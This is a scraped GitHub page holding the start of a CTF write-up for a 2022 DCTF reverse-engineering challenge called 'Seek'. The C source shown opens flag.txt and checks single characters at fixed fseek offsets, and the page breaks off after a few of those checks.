js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/TwentySick/CTF/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div > Permalink <div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":475531499,"originating_url":"https://github.com/TwentySick/CTF/blob/dfb67321400248b74e9f565101748e44c8945ed9/2022/DCTF/reverse_engineering/seek/README.md","user_id":null}}" data-hydro-click-hmac="07b8649bd5dda2e7dba7f966101d8957ec2c2ca6f397ef3edd1fa3c64af7d526"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>dfb6732140</span> <span></span> </summary> <div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header> <input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div> <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div> <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/TwentySick/CTF/refs" cache-key="v0:1648969716.64959" current-committish="ZGZiNjczMjE0MDAyNDhiNzRlOWY1NjUxMDE3NDhlNDRjODk0NWVkOQ==" default-branch="bWFpbg==" name-with-owner="VHdlbnR5U2ljay9DVEY=" prefetch-on-mouseover > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <footer class="SelectMenu-footer">View all branches</footer> </ref-selector> </div> <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/TwentySick/CTF/refs" cache-key="v0:1648969716.64959" current-committish="ZGZiNjczMjE0MDAyNDhiNzRlOWY1NjUxMDE3NDhlNDRjODk0NWVkOQ==" default-branch="bWFpbg==" name-with-owner="VHdlbnR5U2ljay9DVEY=" > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div> </details> </div> <div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div> </div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div> <h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span><span><span>CTF</span></span></span><span>/</span><span><span>2022</span></span><span>/</span><span><span>DCTF</span></span><span>/</span><span><span>reverse_engineering</span></span><span>/</span><span><span>seek</span></span><span>/</span>README.md </h2> Go to file <details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg></summary> <div data-view-component="true"> <span>Go to file</span> <span>T</span> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span> <span>Go to line</span> <span>L</span> </span></button> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="2022/DCTF/reverse_engineering/seek/README.md" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path </clipboard-copy> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/TwentySick/CTF/blob/dfb67321400248b74e9f565101748e44c8945ed9/2022/DCTF/reverse_engineering/seek/README.md" data-view-component="true" class="dropdown-item cursor-pointer"> <span> <span>Copy permalink</span> </span> </clipboard-copy> </div></details></div> <div id="spoof-warning" class="mt-0 pb-3" hidden aria-hidden> <div data-view-component="true" class="flash flash-warn mt-0 clearfix"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert float-left mt-1"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <div class="overflow-hidden">This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.</div> </div></div> <include-fragment src="/TwentySick/CTF/spoofed_commit_check/dfb67321400248b74e9f565101748e44c8945ed9" data-test-selector="spoofed-commit-check"></include-fragment> <div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/TwentySick/CTF/contributors/dfb67321400248b74e9f565101748e44c8945ed9/2022/DCTF/reverse_engineering/seek/README.md" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2"> </div> </div> <div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1"> </div> <span>Cannot retrieve contributors at this time</span> </div></include-fragment></div> <readme-toc> <div data-target="readme-toc.content" class="Box mt-3 position-relative"> <div class="Box-header js-blob-header blob-header js-sticky js-position-sticky top-0 p-2 d-flex flex-shrink-0 flex-md-row flex-items-center" style="position: sticky; z-index: 1;" > <details data-target="readme-toc.trigger" data-menu-hydro-click="{"event_type":"repository_toc_menu.click","payload":{"target":"trigger","repository_id":475531499,"originating_url":"https://github.com/TwentySick/CTF/blob/dfb67321400248b74e9f565101748e44c8945ed9/2022/DCTF/reverse_engineering/seek/README.md","user_id":null}}" data-menu-hydro-click-hmac="086e8ef5c49c08a579540ef85468c4ca72932bae7dedae89007530bc21eb50a2" class="dropdown details-reset details-overlay"> <summary class="btn btn-octicon m-0 mr-2 p-2" aria-haspopup="true" aria-label="Table of Contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-list-unordered"> <path d="M5.75 2.5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5ZM2 14a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm1-6a1 1 0 1 1-2 0 1 1 0 0 1 2 0ZM2 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg> </summary> <details-menu class="SelectMenu" role="menu"> <div class="SelectMenu-modal rounded-3 mt-1" style="max-height:340px;"> <div class="SelectMenu-list SelectMenu-list--borderless p-2" style="overscroll-behavior: contain;"> Seek Challenge Solution </div> </div> </details-menu></details> <div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1"> 800 lines (783 sloc) <span></span> 53.9 KB </div> <div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div> <div class="BtnGroup"> Raw Blame </div> <div class="d-flex"> <div class="ml-1" > </option></form><form class="BtnGroup-parent js-update-url-with-hash " data-turbo="false" action="/TwentySick/CTF/edit/dfb67321400248b74e9f565101748e44c8945ed9/2022/DCTF/reverse_engineering/seek/README.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="zwxGeadTa-v1wLl5Y5LYTjDMNPIHL733wybxVEJNIglClnr3wb1QxT5Vq_R9X1QFh7jJdB6WqmbgPCYH7h5Lbw" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" data-hotkey="e" data-disable-with="" type="submit" data-view-component="true" class="btn-sm BtnGroup-item btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path d="M11.013 1.427a1.75 1.75 0 0 1 2.474 0l1.086 1.086a1.75 1.75 0 0 1 0 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 0 1-.927-.928l.929-3.25c.081-.286.235-.547.445-.758l8.61-8.61Zm.176 4.823L9.75 4.81l-6.286 6.287a.253.253 0 0 0-.064.108l-.558 1.953 1.953-.558a.253.253 0 0 0 .108-.064Zm1.238-3.763a.25.25 0 0 0-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 0 0 0-.354Z"></path></svg></button></form> <details class="details-reset details-overlay select-menu BtnGroup-parent d-inline-block position-relative"> <summary data-disable-invalid="" data-disable-with="" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":475531499,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":false}}" aria-label="Select additional options" data-view-component="true" class="js-blob-dropdown-click select-menu-button btn-sm btn BtnGroup-item float-none px-2"></summary> <div class="SelectMenu right-0"> <div class="SelectMenu-modal width-full"> <div class="SelectMenu-list SelectMenu-list--borderless py-2"> </option></form><form class="SelectMenu-item js-update-url-with-hash " data-turbo="false" action="/TwentySick/CTF/edit/dfb67321400248b74e9f565101748e44c8945ed9/2022/DCTF/reverse_engineering/seek/README.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="JRerwTVlC9rVx7kSutm60gCcGlMlaoM_iNf1gDBRpgSojZdPU4sw9B5Sq5-kFDaZt-jn1TzTlK6rzSLTnALPYg" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" type="submit" data-view-component="true" class="btn-invisible btn width-full d-flex flex-justify-between color-fg-muted text-normal p-0"> <div class="mr-5">Edit this file</div> <div class="color-fg-muted">E</div></button></form> <button aria-label="You must be on a branch to open this file in GitHub Desktop" data-platforms="windows,mac" disabled="disabled" type="submit" data-view-component="true" class="SelectMenu-item no-wrap js-remove-unless-platform btn-invisible btn text-normal"> Open in GitHub Desktop</button> </div> </div> </div> </details></div> <div > </div> <button class="btn-octicon btn-octicon-danger disabled tooltipped tooltipped-nw" disabled aria-label="You must be signed in to make or propose changes" type="button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path d="M11 1.75V3h2.25a.75.75 0 0 1 0 1.5H2.75a.75.75 0 0 1 0-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75ZM4.496 6.675l.66 6.6a.25.25 0 0 0 .249.225h5.19a.25.25 0 0 0 .249-.225l.66-6.6a.75.75 0 0 1 1.492.149l-.66 6.6A1.748 1.748 0 0 1 10.595 15h-5.19a1.75 1.75 0 0 1-1.741-1.575l-.66-6.6a.75.75 0 1 1 1.492-.15ZM6.5 1.75V3h3V1.75a.25.25 0 0 0-.25-.25h-2.5a.25.25 0 0 0-.25.25Z"></path></svg> </button> </div> </div> <div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="js-blob-dropdown-click btn-octicon p-2" aria-haspopup="true" aria-label="possible actions" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":475531499,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":true}}" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> </summary> View raw View blame </details> </div></div> <div id="readme" class="Box-body readme blob js-code-block-container p-5 p-xl-6 gist-border-0"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Seek</h1><h2 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Challenge</h2><h2 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h2>As I know, fseek is working likely pointer in C<details><summary> Original file: </summary><div class="highlight highlight-source-c notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=" #include <stdio.h> #include <stdlib.h> As I know, fseek is working likely pointer in C int oops(){ printf("oops this wasn't the char I was looking for\n"); exit(1); return 0; } int main () { FILE *fp; char c; fp = fopen("flag.txt","r"); if (fp==NULL) { printf("error opening file\n"); exit(1); } fseek(fp,540,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,711,SEEK_SET);c=fgetc(fp);if(c != 32){oops();} fseek(fp,73,SEEK_SET);c=fgetc(fp);if(c != 95){oops();} 